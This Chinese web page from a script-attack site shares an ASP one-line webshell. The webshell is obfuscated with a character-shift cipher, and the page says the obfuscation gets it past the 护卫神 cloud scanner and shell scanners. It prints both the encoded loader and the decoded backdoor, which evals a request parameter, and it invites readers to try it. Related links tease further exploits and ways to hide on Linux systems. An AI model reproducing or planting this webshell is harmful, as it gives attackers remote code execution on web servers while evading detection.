当前位置：代码网 > 服务器>网络安全>脚本攻防 > 一句话木马加密过护卫神云查杀系统过shell扫描器

一句话木马加密过护卫神云查杀系统过shell扫描器

2013年01月10日 • 脚本攻防 •我要评论

一句话木马加密过护卫神云查杀系统过shell扫描器这个一句话木马最近被利用的很多，很多扫描工具扫描不到，不过一些asp版的扫描工具支持扫描eval和execute，如果发现如下代码，请删除，下面就是他们常发的木马后门... 13-01-10

分享给大家暂时未测试大家自己用用看

大马的代码是简单加密了下的！很容易解开看见是加密的一段代码

复制代码

代码如下:

<%
codeds="li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li"
execute (decode (codeds) )
function decode (coded)
on error resume next
for i = 1 to len (coded)
curchar = mid (coded, i, 1)
if asc (curchar) = 16 then
curchar = chr (8)
elseif asc (curchar) = 24 then
curchar = chr (12)
elseif asc (curchar) = 32 then
curchar = chr (18)
else
curchar = chr (asc (curchar) -3)
end if
decode = decode&curchar
next
end function
response.write(decode(codeds))
%>

很简单的加密，解开一看

复制代码

代码如下:

<%
if request("xx") ="x" then eval request("hkmjj") end if
%>

经过测试，发现过目前的护卫神云查杀系统，这个貌似用的人挺多的

PJBlog3 V3.2.8.352文件Action.asp修改任意用户密码

PJBlog3 V3.2.8.352文件Action.asp修改任意用户密码PJBlog一套开源免费的中文个人博客系统程序，采用asp+Access的技术，具... [阅读全文]
十种网络攻击行为介绍您能顶住几个？

十种网络攻击行为介绍您能顶住几个？下面，我们将介绍一些攻击行为案例，对于这些行为不知您是否遇到过？... 12-07-11 [阅读全文]
mysql注入导库脚本代码

mysql注入导库脚本代码mysql注入导库脚本代码，学习安全的朋友要注意防范。... 11-12-17 [阅读全文]
Linux下的匿迹隐藏方法

Linux下的匿迹隐藏方法如何使自己在系统中隐藏的更深，是我们必须掌握的基本功。当然，如果管理员真的想搞你而他的功力又足够足的话，相信没什么人能够真正的踏雪... [阅读全文]
BOSSI 公司企业网站管理系统注入&上传漏洞利用

BOSSI 公司企业网站管理系统注入&上传漏洞利用BOSSI 公司(企业)网站管理系统,中英文双语版,后台在同一页内同时管理添加修改资料内的中英文内容,网站的... [阅读全文]
一个百度应用差评引起的渗透渗透百度应用全过程

一个百度应用差评引起的渗透渗透百度应用全过程本文教你如何修改百度应用差评... 12-06-15 …

2012年06月15日 • 网络安全

发表评论


验证码：

一句话木马加密 过护卫神云查杀系统 过shell扫描器

2013年01月10日 • 脚本攻防 •我要评论

相关文章:

一个百度应用差评引起的渗透 渗透百度应用全过程

发表评论

一句话木马加密过护卫神云查杀系统过shell扫描器

一个百度应用差评引起的渗透渗透百度应用全过程